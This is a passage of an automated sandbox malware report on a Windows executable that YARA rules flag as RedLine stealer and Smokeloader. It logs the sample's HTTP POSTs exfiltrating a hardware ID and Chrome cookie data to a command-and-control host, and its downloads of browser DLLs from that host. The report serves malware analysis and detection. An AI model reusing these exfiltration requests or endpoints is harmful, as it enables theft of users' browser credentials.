6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file"------CGDGHCBGDHJJKECAECBA--
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file"------JECBGCFHCFIDHIDHDGDG--
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: Joe Sandbox View ASN Name: ASRELINKRU ASRELINKRU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/freebl3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/mozglue.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/msvcp140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/nss3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/softokn3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/vcruntime140.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: okkolus.com
Source: unknown HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php&)
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php/M
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpN
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpt
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/cf5cbdf706840b3f.phpte3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dlld
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/mozglue.dllser
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll.U
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dll9M
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllJT
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlle
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllllx
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dlloU
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/oTab
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/ra
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/soft
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dll.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/softokn3.dller
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/sqlite3.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dll%
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata
Source: FFAk2gixx5.exe, 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://okkolus.comppData
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: JEHIJDGI.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JEHIJDGI.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEHIJDGI.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: JEHIJDGI.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: JEHIJDGI.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61EAD2AC 0_2_61EAD2AC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E4B8A1 0_2_61E4B8A1
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E75F1F 0_2_61E75F1F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E40065 0_2_61E40065
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E9E24F 0_2_61E9E24F
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E5023C 0_2_61E5023C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E62554 0_2_61E62554
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_61E4E4BF 0_2_61E4E4BF
